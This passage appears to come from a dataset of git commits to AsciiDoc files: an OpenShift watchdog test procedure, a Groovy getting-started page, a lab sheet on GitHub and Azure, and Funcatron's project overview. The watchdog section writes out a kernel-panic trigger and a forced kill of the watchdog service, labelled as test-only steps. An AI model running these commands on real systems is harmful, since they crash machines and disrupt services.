Apply the YAML file to your cluster by running the following command:\n\n+\n[source,yaml]\n----\n$ oc apply -f <file_name>.yaml\n----\n\n.Verification\n\n--\n[IMPORTANT]\n====\nThis procedure is provided for testing watchdog functionality only and must not be run on production machines.\n====\n--\n\n. Run the following command to verify that the VM is connected to the watchdog device:\n\n+\n[source,terminal]\n----\n$ lspci | grep watchdog -i\n----\n\n. Run one of the following commands to confirm the watchdog is active:\n\n\n* Trigger a kernel panic:\n+\n[source,terminal]\n----\n$ echo c > \/proc\/sysrq-trigger\n----\n\n* Terminate the watchdog service:\n+\n[source,terminal]\n----\n$ kill -9 pgrep watchdog\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5f6b2690a99e4a3fd402e56d06a31213ef28159f","subject":"Title \"IDE plugin\" changed. Typo fix.","message":"Title \"IDE plugin\" changed. Typo fix.\n","repos":"gillius\/incubator-groovy,paulk-asert\/groovy,kenzanmedia\/incubator-groovy,genqiang\/incubator-groovy,kenzanmedia\/incubator-groovy,paulk-asert\/groovy,guangying945\/incubator-groovy,adjohnson916\/incubator-groovy,adjohnson916\/groovy-core,adjohnson916\/incubator-groovy,groovy\/groovy-core,armsargis\/groovy,eginez\/incubator-groovy,apache\/groovy,shils\/incubator-groovy,pledbrook\/incubator-groovy,samanalysis\/incubator-groovy,ChanJLee\/incubator-groovy,sagarsane\/groovy-core,EPadronU\/incubator-groovy,eginez\/incubator-groovy,armsargis\/groovy,bsideup\/incubator-groovy,jwagenleitner\/incubator-groovy,rlovtangen\/groovy-core,alien11689\/groovy-core,antoaravinth\/incubator-groovy,paulk-asert\/groovy,antoaravinth\/incubator-groovy,ebourg\/groovy-core,rabbitcount\/incubator-groovy,kidaa\/incubator-groovy,shils\/groovy,tkruse\/incubator-groovy,rlovtangen\/groovy-core,PascalSchumacher\/incubator-groovy,genqiang\/incubator-groovy,graemerocher\/incubator-groovy,antoaravinth\/incubator-groovy,shils\/incubator-groovy,aaronzirbes\/incubator-groovy,sagarsane\/incubator-groovy,nkhuyu\/incubator-groovy,dpolivaev\/groovy,ebourg\/groovy-core,apache\/groovy,dpolivaev\/groovy,paulk-asert\/incubator-groovy,sagarsane\/incubator-groovy,alien11689\/groovy-core,alien11689\/incubator-groovy,rabbitcount\/incubator-groovy,tkruse\/incubator-groovy,avafanasiev\/groovy,upadhyayap\/incubator-groovy,sagarsane\/groovy-core,aaronzirbes\/incubator-groovy,sagarsane\/groovy-core,ebourg\/incubator-groovy,nkhuyu\/incubator-groovy,EPadronU\/incubator-groovy,fpavageau\/groovy,pickypg\/incubator-groovy,gillius\/incubator-groovy,christoph-frick\/groovy-core,mariogarcia\/groovy-core,paulk-asert\/groovy,upadhyayap\/incubator-groovy,paplorinc\/incubator-groovy,jwagenleitner\/groovy,bsideup\/incubator-groovy,upadhyayap\/incubator-groovy,PascalSchumacher\/incubator-groovy,fpavageau\/groovy,paulk-asert\/incubator-groovy,mariogarcia\/groovy-core,avafanasiev\/groovy,aim-for-better\/incubator-groovy,traneHead\/groovy-core,shils\/incubator-groovy,groovy\/groovy-core,bsideup\/groovy-core,taoguan\/incubator-groovy,guangying945\/incubator-groovy,ChanJLee\/incubator-groovy,mariogarcia\/groovy-core,ebourg\/incubator-groovy,kidaa\/incubator-groovy,paulk-asert\/incubator-groovy,alien11689\/incubator-groovy,avafanasiev\/groovy,nobeans\/incubator-groovy,nobeans\/incubator-groovy,bsideup\/groovy-core,kidaa\/incubator-groovy,EPadronU\/incubator-groovy,aim-for-better\/incubator-groovy,rlovtangen\/groovy-core,groovy\/groovy-core,aim-for-better\/incubator-groovy,pledbrook\/incubator-groovy,kidaa\/incubator-gro
ovy,kenzanmedia\/incubator-groovy,taoguan\/incubator-groovy,alien11689\/groovy-core,genqiang\/incubator-groovy,christoph-frick\/groovy-core,russel\/groovy,ChanJLee\/incubator-groovy,i55ac\/incubator-groovy,bsideup\/incubator-groovy,russel\/groovy,PascalSchumacher\/incubator-groovy,sagarsane\/incubator-groovy,armsargis\/groovy,apache\/incubator-groovy,ebourg\/incubator-groovy,alien11689\/groovy-core,taoguan\/incubator-groovy,apache\/groovy,jwagenleitner\/incubator-groovy,nkhuyu\/incubator-groovy,ebourg\/groovy-core,yukangguo\/incubator-groovy,fpavageau\/groovy,shils\/groovy,adjohnson916\/incubator-groovy,PascalSchumacher\/incubator-groovy,yukangguo\/incubator-groovy,PascalSchumacher\/incubator-groovy,ebourg\/groovy-core,graemerocher\/incubator-groovy,apache\/incubator-groovy,apache\/incubator-groovy,rlovtangen\/groovy-core,tkruse\/incubator-groovy,paplorinc\/incubator-groovy,guangying945\/incubator-groovy,samanalysis\/incubator-groovy,pickypg\/incubator-groovy,rlovtangen\/groovy-core,russel\/incubator-groovy,mariogarcia\/groovy-core,pledbrook\/incubator-groovy,nkhuyu\/incubator-groovy,gillius\/incubator-groovy,samanalysis\/incubator-groovy,adjohnson916\/incubator-groovy,paulk-asert\/incubator-groovy,avafanasiev\/groovy,paulk-asert\/incubator-groovy,sagarsane\/groovy-core,graemerocher\/incubator-groovy,traneHead\/groovy-core,eginez\/incubator-groovy,armsargis\/groovy,russel\/incubator-groovy,upadhyayap\/incubator-groovy,groovy\/groovy-core,nobeans\/incubator-groovy,rabbitcount\/incubator-groovy,pledbrook\/incubator-groovy,EPadronU\/incubator-groovy,apache\/groovy,alien11689\/incubator-groovy,aaronzirbes\/incubator-groovy,christoph-frick\/groovy-core,jwagenleitner\/incubator-groovy,eginez\/incubator-groovy,ebourg\/incubator-groovy,bsideup\/incubator-groovy,antoaravinth\/incubator-groovy,russel\/groovy,jwagenleitner\/groovy,adjohnson916\/groovy-core,traneHead\/groovy-core,ChanJLee\/incubator-groovy,yukangguo\/incubator-groovy,aim-for-better\/incubator-groovy,alien11689\/incubator-groovy,russel\/groovy,genqiang\/incubator-groovy,sagarsane\/incubator-groovy,graemerocher\/incubator-groovy,gillius\/incubator-groovy,groovy\/groovy-core,paplorinc\/incubator-groovy,kenzanmedia\/incubator-groovy,ebourg\/groovy-core,apache\/incubator-groovy,dpolivaev\/groovy,adjohnson916\/groovy-core,i55ac\/incubator-groovy,christoph-frick\/groovy-core,guangying945\/incubator-groovy,i55ac\/incubator-groovy,jwagenleitner\/groovy,jwagenleitner\/incubator-groovy,paplorinc\/incubator-groovy,shils\/groovy,pickypg\/incubator-groovy,traneHead\/groovy-core,jwagenleitner\/groovy,adjohnson916\/groovy-core,aaronzirbes\/incubator-groovy,yukangguo\/incubator-groovy,sagarsane\/groovy-core,christoph-frick\/groovy-core,fpavageau\/groovy,shils\/groovy,russel\/incubator-groovy,nobeans\/incubator-groovy,dpolivaev\/groovy,shils\/incubator-groovy,rabbitcount\/incubator-groovy,i55ac\/incubator-groovy,alien11689\/groovy-core,bsideup\/groovy-core,pickypg\/incubator-groovy,russel\/incubator-groovy,taoguan\/incubator-groovy,bsideup\/groovy-core,adjohnson916\/groovy-core,mariogarcia\/groovy-core,tkruse\/incubator-groovy,samanalysis\/incubator-groovy","old_file":"src\/spec\/doc\/core-getting-started.adoc","new_file":"src\/spec\/doc\/core-getting-started.adoc","new_contents":"= Getting started\n:toc:\n:icons: font\n:linkcss!:\n\n== Download\n\nIn this download area, you will be able to download the distribution (binary and source), the Windows installer (for some of the versions) and the documentation for **Groovy**.\n\nFor a quick and effortless 
start on Mac OSX, Linux or Cygwin, you can use link:http:\/\/gvmtool.net[GVM] (the Groovy enVironment Manager) to download and configure any **Groovy** version of your choice. Basic (TODO)[instructions] can be found below.\n\n=== Groovy 2.1\n\n==== Groovy 2.1.6\n\n==== Groovy 2.1.5\n\n=== Groovy 2.2\n\n==== Groovy 2.2.0-beta-1\n\n=== Groovy 2.0\n\n==== Groovy 2.0.8\n\n=== Groovy 1.8 (Maintenance Release)\n\n==== Groovy 1.8.9\n\n=== Snapshots\n\n=== Older Releases\n\n==== Groovy 1.7.11\n\n==== Groovy 1.6.9\n\n==== Groovy 1.5.8\n\n=== Legacy Groovy 1.0\n\n\n== Maven Repositories\n\n=== Groovy 2.0.X and newer\n\n=== Groovy 1.6.X - 1.8.X\n\n=== Groovy 1.1.X - 1.5.X\n\n=== Groovy 1.0\n\n=== Snapshot Releases\n\n\n== GVM (the Groovy enVironment Manager)\n\n\n== Other ways to get Groovy\n\n=== Installation on Mac OS X\n\n==== MacPorts\n\nSet up link:http:\/\/www.macports.org[MacPorts] and type in the Terminal:\n\n[source,shell]\n----\nsudo port install groovy\n----\n\n==== Homebrew\n\n=== Installation on Windows\n\n=== Other Distributions\n\n=== Source Code\n\n=== IDE plugin\n\n\n== Install Binary\n\nThese instructions describe how to install a binary distribution of **Groovy**.\n\n* First, link:#download-groovy[Download] a binary distribution of Groovy and unpack it into some file on your local file system.\n* Set your ++GROOVY_HOME++ environment variable to the directory you unpacked the distribution.\n* Add ++GROOVY_HOME\/bin++ to your ++PATH++ environment variable.\n* Set your ++JAVA_HOME++ environment variable to point to your JDK. On OS X this is ++\/Library\/Java\/Home++, on other unixes its often ++\/usr\/java++ etc. If you've already installed tools like Ant or Maven you've probably already done this step.\n\nYou should now have Groovy installed properly. You can test this by typing the following in a command shell:\n\n[source,shell]\n----\ngroovysh\n----\n\nWhich should create an interactive groovy shell where you can type Groovy statements. Or to run the link:tools\/tools-groovyconsole.html[Swing interactive console] type:\n\n[source,shell]\n----\ngroovyConsole\n----\n\nTo run a specific Groovy script type:\n\n[source,shell]\n----\ngroovy SomeScript.groovy\n----\n","old_contents":"= Getting started\n:toc:\n:icons: font\n:linkcss!:\n\n== Download\n\nIn this download area, you will be able to download the distribution (binary and source), the Windows installer (for some of the versions) and the documentation for **Groovy**.\n\nFor a quick and effortless start on Mac OSX, Linux or Cygwin, you can use link:http:\/\/gvmtool.net[GVM] (the Groovy enVironment Manager) to download and configure any **Groovy** version of your choice. 
Basic (TODO)[instructions] can be found below.\n\n=== Groovy 2.1\n\n==== Groovy 2.1.6\n\n==== Groovy 2.1.5\n\n=== Groovy 2.2\n\n==== Groovy 2.2.0-beta-1\n\n=== Groovy 2.0\n\n==== Groovy 2.0.8\n\n=== Groovy 1.8 (Maintenance Release)\n\n==== Groovy 1.8.9\n\n=== Snapshots\n\n=== Older Releases\n\n==== Groovy 1.7.11\n\n==== Groovy 1.6.9\n\n==== Groovy 1.5.8\n\n=== Legacy Groovy 1.0\n\n\n== Maven Repositories\n\n=== Groovy 2.0.X and newer\n\n=== Groovy 1.6.X - 1.8.X\n\n=== Groovy 1.1.X - 1.5.X\n\n=== Groovy 1.0\n\n=== Snapshot Releases\n\n\n== GVM (the Groovy enVironment Manager)\n\n\n== Other ways to get Groovy\n\n=== Installation on Mac OS X\n\n==== MacPorts\n\nSet up link:http:\/\/www.macports.org[MacPorts] and type in the Terminal:\n\n[source,shell]\n----\nsudo port install groovy\n----\n\n==== Homebrew\n\n=== Installation on Windows\n\n=== Other Distributions\n\n=== Source Code\n\n== IDE plugin\n\n\n== Install Binary\n\nThese instructions describe how to install a binary distribution of **Groovy**.\n\n* First, link:#download-groovy[Download] a binary distribution of Groovy and unpack it into some file on your local file system.\n* Set your ++GROOVY_HOME++ environment variable to the directory you unpacked the distribution.\n* Add ++GROOVY_HOME\/bin++ to your ++PATH++ environment variable.\n* Set your ++JAVA_HOME++ environment variable to point to your JDK. On OS X this is ++\/Library\/Java\/Home++, on other unixes its often ++\/usr\/java++ etc. If you've already installed tools like Ant or Maven you've probably already done this step.\n\nYou should now have Groovy installed properly. You can test this by typing the following in a command shell:\n\n[source,shell]\n----\ngroovysh\n----\n\nWhich should create an interactive groovy shell where you can type Groovy statements. Or to run the link:tools\/tools-groovyconsole.html[Swing interactive console] type:\n\n[source,shell]\n----\ngroovyConsole\n----\n\nTo run a specific Groovy script type:\n\n[source,shell]\n----\ngroovy SomeScript.groovy\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e93616d0859b3ee4ebf856c57b25508ea680921e","subject":"vscode","message":"vscode\n","repos":"dm-academy\/aitm-labs,dm-academy\/aitm-labs,dm-academy\/aitm-labs","old_file":"Lab-04\/04-tech-lab-v3.adoc","new_file":"Lab-04\/04-tech-lab-v3.adoc","new_contents":"= Tech lab 04 (version 3)\n\n== Overall goal \n\nTrack, with Github, Microsoft Azure and possibly ServiceNow, the course material on a technical level.\n\n== Section II priorities: it's all about the team. \n\n. Recommended editor: VSCode\n\n. Figure out public\/private key for Github. \n\n. Form 3 teams.\n\n. Each team member: Get a free student account for Azure. (Not sure if there is an approval cycle.) Do NOT give them a credit card. \n\n. Spin up a VM and access it there. \n\n. Get some software (any of the things we worked on last week) running on it in a way that others can view (preferably a simple curl that returns a string or a number).\n\n. Put that software into version control, in the aitm-labs\/svc* repo as appropriate. I control those repos? How do you do this using GitHub?\n\n. Explore the Microsoft work management \/ Kanban capabilities. Connect them to Github pull requests. Update your software and ensure that the person making the changes does not push to master, but instead issues a pull request of a team mate (basic peer review).\n\n. Connect Azure pipelines with GitHub so that you can automatically deploy on commit from Github. 
\n\n\n\n","old_contents":"= Tech lab 04 (version 3)\n\n== Overall goal \n\nTrack, with Github, Microsoft Azure and possibly ServiceNow, the course material on a technical level.\n\n== Section II priorities: it's all about the team. \n\n. Recommended editor: VSCode\n\n. Form 3 teams.\n\n. Each team member: Get a free student account for Azure. (Not sure if there is an approval cycle.) Do NOT give them a credit card. \n\n. Spin up a VM and access it there. \n\n. Get some software (any of the things we worked on last week) running on it in a way that others can view (preferably a simple curl that returns a string or a number).\n\n. Put that software into version control, in the aitm-labs\/svc* repo as appropriate. I control those repos? How do you do this using GitHub?\n\n. Explore the Microsoft work management \/ Kanban capabilities. Connect them to Github pull requests. Update your software and ensure that the person making the changes does not push to master, but instead issues a pull request of a team mate (basic peer review).\n\n. Connect Azure pipelines with GitHub so that you can automatically deploy on commit from Github. \n\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"86aa24924c9ee6a01e5bd96a5ca0f07b61fdb107","subject":"Quick starts above fold","message":"Quick starts above fold\n","repos":"funcatron\/funcatron,funcatron\/funcatron,funcatron\/funcatron,funcatron\/funcatron","old_file":"doc_o_matic\/front_master.adoc","new_file":"doc_o_matic\/front_master.adoc","new_contents":"= Funcatron\n:toc:\n\n== Quick Starts\n\nlink:\/master\/funcatron\/info\/spring_boot.html[Spring Boot Quickstart].\n\nlink:\/master\/funcatron\/info\/dev_intro.html[Lambda-style Quickstart].\n\n== About\n\n\nServerless on Your Cluster:\n\n* Define Endpoints in Swagger\n* Write Functions in Java, Scala, Clojure, Python, or JavaScript\n* Deploy to Mesos, Kubernetes, or Swarm\n* Autoscale\n\n_Funcatron lets you deploy serverless on any cloud provider or in your\nprivate cloud. Focus on the functions, avoid vendor lock-in._\n\nThis document sets out the goals for the http:\/\/funcatron.org[Funcatron] project.\n\n### Getting Started w\/Spring Boot\n\nIf you've already got a https:\/\/spring.io\/guides\/gs\/spring-boot\/[Spring Boot]\napp and you want to run it in Funcatron... you're in luck. Add a few dependencies\nand 2 classes to your existing Spring Boot app and you're good to go.\nThe link:\/master\/funcatron\/info\/spring_boot.html[Spring Boot Quickstart]\ngets you started... quickly.\n\nAnd check out the link:\/master\/funcatron\/info\/architecture_strategy.html[Architecture\nStrategy] for a deeper dive into Funcatron.\n\n### Getting Started Lambda-style\n\n\"`Lambdas`\" are small units of computing... Funcations. Funcatron\nsupports writing small funcations, associating them with REST endpoints,\nand autoscaling. The\nlink:\/master\/funcatron\/info\/dev_intro.html[Developer Intro] to\nFuncatron walks you through building Funcatron bundles Lambda-style.\n\nAnd check out the link:\/master\/funcatron\/info\/architecture_strategy.html[Architecture\nStrategy] for a deeper dive into Funcatron.\n\n\n### What's Funcatron\n\nAmazon's https:\/\/aws.amazon.com\/lambda\/[Lambda] popularized\nhttp:\/\/www.martinfowler.com\/articles\/serverless.html[\"`serverless`\"]\ncode deployment. It's dead simple: associate a \"`function`\" with an event.\nEach time the event happens, the function is applied and the function's\nreturn value is returned to the event source. An event could be an HTTP(S)
An event could be an HTTP(S)\nrequest, something on an event queue, whatever.\n\nFunctions are ephemeral. They exist for the duration of the function call.\nOnce the function returns a value, all of its state and scope and everything\nelse about it is assumed to go away.\n\nScaling this kind of architecture is simple: the more frequently a function gets\napplied, the more compute resources are allocated to support the function...\nand https:\/\/en.wikipedia.org\/wiki\/Bob%27s_your_uncle[Bob's Your Uncle].\n\nThe current popular function runners (competitors to Amazon's Lambda), however, are\nproprietary: when you write to the API for Lambda or Google's\nhttps:\/\/cloud.google.com\/functions\/docs\/[Cloud Functions],\n_**you're locked into that vendor**_.\n\nThere's currently no (well, there's https:\/\/developer.ibm.com\/openwhisk\/[OpenWhisk])\ngeneric way to do the auto-scale function thing on a private cloud or in a\nway that can migrate from one cloud provider to another.\n\nFuncatron addresses this. Funcatron is a cloud-provider-neutral mechanism for\ndeveloping, testing, and deploying auto-scalable functions.\n\nFuncatron is designed to run on container orchestration clusters:\nhttps:\/\/mesosphere.com\/[Mesos], http:\/\/kubernetes.io\/[Kubernetes], or\nhttps:\/\/docker.com[Docker Swarm].\n\n### Software Lifecycle\n\nSoftware goes through a lifecycle:\n\n- Authoring\n- Testing\n- Staging\n- Production\n- Debugging\n\nFuncatron addresses software at each stage of the lifecycle.\n\n#### Authoring\n\nAn engineers sits down to write software. The faster the turn-around between\ncode written and \"`trying it out,`\" the more productive the engineer will be.\n\nFuncatron supports a \"`save, reload`\" model where the engineer saves a file\n(presuming they're using an IDE that does compilation on save or are using a\nnon-compiled language), and their function endpoints are available. That's it.\nNo uploading. No reconfiguration. No waiting. The endpoint is available on save.\n\nFurther, the Funcatron model requires knowledge of two things:\n\n* http:\/\/swagger.io[Swagger]\n* How to write a simple function in Java, Scala, Clojure, Python, or JavaScript.\n\n**That's it.**\n\nThe engineer defines the endpoints in Swagger and uses the `operationId` to\nspecify the function (or class for Java and Scala) to apply when then endpoint\nis requested. Funcatron takes care of the rest.\n\nBetween the fast turn-around and low \"`new stuff to learn`\" quotient,\nit's easy to get started with Funcatron. It's also easy to stay productive\nwith Funcatron.\n\nAlso, developers need only have Docker installed on their development machine\nto live-test Funcatron code.\n\n#### Testing\n\nBecause Funcatron endpoints are single functions (or methods on newly\ninstantiated classes), writing unit tests is simple. Write a unit test and\ntest the function.\n\n#### Staging\n\nFuncatron code bundles (Funcs) contain a Swagger endpoint definition and the\nfunctions\nthat are associated with the endpoint and any library code. For JVM languages,\nthese are bundled into an Uber JAR. For Python, a\nhttps:\/\/github.com\/pantsbuild\/pex[PEX]\nfile. 
The Swagger definitions for an endpoint are unique based on\nhost name and root path.\n\nFuncatron supports aliasing Swagger fields and values in different\nenvironments such that a single Swagger definition can be run\nin staging and testing environments without change.\nThus, there's one deployment unit (a Func bundle) that have well defined\nbehaviors across test, staging, and production servers.\n\n#### Production\n\nFuncatron allows simple deployment and undeployment of end-point collections\ndefined in Swagger files and implemented in a JVM language, Python, or NodeJS.\n\nRequests are forwarded from Nginx via a message queue to a dispatcher (a Tron).\nBased on the hostname and root path, the message is placed on a queue for\na specific Func. The Func processes the request and sends the response\nto a reply queue. The Nginx process dequeues the response and returns\nit as an HTTP response.\n\nThe number of Func instances running on a cluster is based on the queue depth\nand response time. The Func manager sends statistics back to the Trons\nand the Trons change Func allocation based on these statistics by\ncommunicating with the container orchestration substrate (Mesos, Kubernetes,\nSwarm) and changing the allocation of Func running containers.\n\nFrom the DevOps point of view: deploy a Func and it binds to the appropriate\nHTTP endpoint and scales to handle load.\n\n#### Debugging & Test Cases\n\nFuncatron logs a unique request ID and the SHA of the Func with every log line\nrelated to a request. This allows correlation of requests as they fan out through\na cluster.\n\nFuncatron allows dynamic changing log levels on a Func-by-Func basis which allows\ncapturing more information on demand.\n\nAll communications between the front end, Funcs, and back again are via well\ndefined JSON payloads. Funcatron allows capturing request and response\npayloads on a Func-by-Func basis (complete streams, or random sampling).\nThis data can be used for testing or debugging.\n\n### Architecture\n\nFuncatron has some ambitious goals... and has an architecture to facilitate\nachieving these goals.\n\nIn all but development mode, Funcatron runs on a Docker container orchestration\nsystem: Mesos, Kubernetes, or Docker Swarm. We call this the \"container\nsubstrate.\" Each of the Funcatron components can be scaled independently with\nmessages to the container substrate.\n\nFor HTTP requests, Funcatron uses Nginx and Lua (via the\nhttp:\/\/openresty.org\/en\/[OpenResty] project) to handle the HTTP requests.\nA small\nLua script encodes the request as a payload that's sent to a message broker\n(initially RabbitMQ, but this will be pluggable, e.g. Kafka, Redis). For large\nrequest or response bodies, there will be a direct connection between the Front End\nand the Runner.\nFor all but the highest volume installations, 2 Nginx instances\nshould be sufficient.\n\nBased on the combination of `host` and `pathPrefix` attributes in the Swagger\nmodule definition, the Tron enqueues the request on the appropriate queue.\n\nA Runner module dequeues messages from a number of host\/pathPrefix queues and\nforwards the request to the appropriate Func. The runner then takes the function\nreturn value and appropriately encodes it and places it on the reply queue which\ndequeued by the original endpoint.\n\nEach Func can run multiple modules. 
Based on queue depth, queue service time,\nand CPU usage stats from the Funcs, more runners can be allocated on the substrate,\nor more Funcs can be allocated across the runners.\n\nThe Lua scripts dequeues the response and turns in into an Nginx response.\n\nBecause all of the operation of the Funcs and Trons can be captured as messages\n(and all the messages are in JSON), it's possible to capture message streams for\ntesting and debugging purposes.\n\nEvery request has a unique ID and each log line includes the unique ID so it's\npossible to correlate a request as it moves across the cluster.\n\n[plantuml]\n----\nskinparam handwritten true\n\n\n() \"Upload\/Enable\" as Operator\n\n() \"HTTPS Proxy\" as Proxy\n\nnode \"Message Queue\" as MQ\n\npackage \"Public Facing\" {\n [Frontend]\n}\n\nnode {\n [Tron]\n [Runner]\n}\n\n\nProxy -> [Frontend] : \"HTTP port 80\"\n\n[Frontend] <--> MQ : Stomp\n\n[Tron] <--> MQ : AMQP\n\nNote left of [Frontend]: Multiple instances\n\n[Frontend] -> [Runner] : \"HTTP port 4000\"\n\n[Runner] -> [Tron] : \"HTTP port 3000\"\n\nNote left of [Runner] : Multiple instances\\nAuto-scaled\n\nNote left of [Tron] : One instance\n\nNote left of MQ : Cluster\n\nNote left of Operator : Access to control\\nFuncatron cluster\n\n\n[Runner] <--> MQ : AMQP\n\nOperator -> [Tron] : \"HTTP port 3000\"\n----\n\n#### Notes\n\nThe initial implementation uses Nginx\/OpenResty, RabbitMQ, Java\/Scala, and Mesos\nto support HTTP requests. This is not \"`hardcoded`\" but pluggable. Specifically:\n\n* Anything that can enqueue a payload and dequeue the response can\n work with the rest of Funcatron. The initial implementation is HTTP via\n Nginx\/OpenResty, but nothing in the rest of the system depends on what enqueues\n the request and dequeues the response.\n* RabbitMQ is the initial message broker, but it could be Kafka, Redis, or any other\n message broker. This is pluggable.\n* Initially, dispatch from Runners to Funcs will be Java\/Scala\/Kotlin classes. But the\n dispatch is also pluggable so other languages (Clojure) and\n runtimes (Python, NodeJS, Ruby\/Rails) will be supported.\n* \"`But Swagger is HTTP only`\" well... yes and no... the verb and the scheme are\n HTTP-specific, but they can be ignored... and by the time the request is\n dequeued by the Runner, the origin (HTTP or something else) of the message\n is irrelevant. The power of Swagger is two-fold:\n ** Excellent definitions of incoming and outgoing data shapes\n ** Great tooling and lots of general Swagger skills\n\nBecause everything in Funcatron is asynchronous messages, how the messages are\npassed, where the message originate and where responses are dequeued are all\npluggable and irrelevant to the other parts of the system.\n\nThe key idea in Funcatron is the Func is a well defined bundle of functionality\nthat's associated with a particular message signature that maps to well HTTP via\nhost, pathPrefix, path, and verb, but could map to something else.\n\nIt may be possible to chain Func invocations. I don't yet have a concrete\ndesign, but rather than enqueuing a Func return value as a response, it may\nbe possible to package it as a request (the request body contains the Func\nreturn value) and forwarding it to another Func for further processing.\n\nFinally, if there's no `reply-to` field in a message, the Func is applied (invoked)\nbut the results are discarded. 
This allows for side effects from the Func\nrather than just computation.\n\n\n### Contributing\n\nPlease see https:\/\/github.com\/funcatron\/tron\/blob\/master\/CONTRIBUTING.md[CONTRIBUTING] for details on\nhow to make a contribution.\n\n### Licenses and Support\n\nFuncatron is licensed under an Apache 2 license.\n\nSupport is available from the project's founder,\n[David Pollak](mailto:feeder.of.the.bears@gmail.com).\n\n\n== Documentation Versions\n\n$$VERSIONLIST$$\n\n","old_contents":"= Funcatron\n:toc:\n\n== About\n\nServerless on Your Cluster:\n\n* Define Endpoints in Swagger\n* Write Functions in Java, Scala, Clojure, Python, or JavaScript\n* Deploy to Mesos, Kubernets, or Swarm\n* Autoscale\n\n_Funcatron let's you deploy serverless on any cloud provider or in your\nprivate cloud. Focus on the functions, avoid vendor lock-in._\n\nThis document sets out the goals for the http:\/\/funcatron.org[Funcatron] project.\n\n### Getting Started w\/Spring Boot\n\nIf you've already got a https:\/\/spring.io\/guides\/gs\/spring-boot\/[Spring Boot]\napp and you want to run it in Funcatron... you're in luck. Add a few dependencies\nand 2 classes to your existing Spring Boot app and you're good to go.\nThe link:\/master\/funcatron\/info\/spring_boot.html[Spring Boot Quickstart]\ngets you started... quickly.\n\nAnd check out the link:\/master\/funcatron\/info\/architecture_strategy.html[Architecture\nStrategy] for a deeper dive into Funcatron.\n\n### Getting Started Lambda-style\n\n\"`Lambdas`\" are small units of computing... Funcations. Funcatron\nsupports writing small funcations, associating them with REST endpoints,\nand autoscaling. The\nlink:\/master\/funcatron\/info\/dev_intro.html[Developer Intro] to\nFuncatron walks you through building Funcatron bundles Lambda-style.\n\nAnd check out the link:\/master\/funcatron\/info\/architecture_strategy.html[Architecture\nStrategy] for a deeper dive into Funcatron.\n\n\n### What's Funcatron\n\nAmazon's https:\/\/aws.amazon.com\/lambda\/[Lambda] popularized\nhttp:\/\/www.martinfowler.com\/articles\/serverless.html[\"`serverless`\"]\ncode deployment. It's dead simple: associate a \"`function`\" with an event.\nEach time the event happens, the function is applied and the function's\nreturn value is returned to the event source. An event could be an HTTP(S)\nrequest, something on an event queue, whatever.\n\nFunctions are ephemeral. They exist for the duration of the function call.\nOnce the function returns a value, all of its state and scope and everything\nelse about it is assumed to go away.\n\nScaling this kind of architecture is simple: the more frequently a function gets\napplied, the more compute resources are allocated to support the function...\nand https:\/\/en.wikipedia.org\/wiki\/Bob%27s_your_uncle[Bob's Your Uncle].\n\nThe current popular function runners (competitors to Amazon's Lambda), however, are\nproprietary: when you write to the API for Lambda or Google's\nhttps:\/\/cloud.google.com\/functions\/docs\/[Cloud Functions],\n_**you're locked into that vendor**_.\n\nThere's currently no (well, there's https:\/\/developer.ibm.com\/openwhisk\/[OpenWhisk])\ngeneric way to do the auto-scale function thing on a private cloud or in a\nway that can migrate from one cloud provider to another.\n\nFuncatron addresses this. 
Funcatron is a cloud-provider-neutral mechanism for\ndeveloping, testing, and deploying auto-scalable functions.\n\nFuncatron is designed to run on container orchestration clusters:\nhttps:\/\/mesosphere.com\/[Mesos], http:\/\/kubernetes.io\/[Kubernetes], or\nhttps:\/\/docker.com[Docker Swarm].\n\n### Software Lifecycle\n\nSoftware goes through a lifecycle:\n\n- Authoring\n- Testing\n- Staging\n- Production\n- Debugging\n\nFuncatron addresses software at each stage of the lifecycle.\n\n#### Authoring\n\nAn engineers sits down to write software. The faster the turn-around between\ncode written and \"`trying it out,`\" the more productive the engineer will be.\n\nFuncatron supports a \"`save, reload`\" model where the engineer saves a file\n(presuming they're using an IDE that does compilation on save or are using a\nnon-compiled language), and their function endpoints are available. That's it.\nNo uploading. No reconfiguration. No waiting. The endpoint is available on save.\n\nFurther, the Funcatron model requires knowledge of two things:\n\n* http:\/\/swagger.io[Swagger]\n* How to write a simple function in Java, Scala, Clojure, Python, or JavaScript.\n\n**That's it.**\n\nThe engineer defines the endpoints in Swagger and uses the `operationId` to\nspecify the function (or class for Java and Scala) to apply when then endpoint\nis requested. Funcatron takes care of the rest.\n\nBetween the fast turn-around and low \"`new stuff to learn`\" quotient,\nit's easy to get started with Funcatron. It's also easy to stay productive\nwith Funcatron.\n\nAlso, developers need only have Docker installed on their development machine\nto live-test Funcatron code.\n\n#### Testing\n\nBecause Funcatron endpoints are single functions (or methods on newly\ninstantiated classes), writing unit tests is simple. Write a unit test and\ntest the function.\n\n#### Staging\n\nFuncatron code bundles (Funcs) contain a Swagger endpoint definition and the\nfunctions\nthat are associated with the endpoint and any library code. For JVM languages,\nthese are bundled into an Uber JAR. For Python, a\nhttps:\/\/github.com\/pantsbuild\/pex[PEX]\nfile. The Swagger definitions for an endpoint are unique based on\nhost name and root path.\n\nFuncatron supports aliasing Swagger fields and values in different\nenvironments such that a single Swagger definition can be run\nin staging and testing environments without change.\nThus, there's one deployment unit (a Func bundle) that have well defined\nbehaviors across test, staging, and production servers.\n\n#### Production\n\nFuncatron allows simple deployment and undeployment of end-point collections\ndefined in Swagger files and implemented in a JVM language, Python, or NodeJS.\n\nRequests are forwarded from Nginx via a message queue to a dispatcher (a Tron).\nBased on the hostname and root path, the message is placed on a queue for\na specific Func. The Func processes the request and sends the response\nto a reply queue. The Nginx process dequeues the response and returns\nit as an HTTP response.\n\nThe number of Func instances running on a cluster is based on the queue depth\nand response time. 
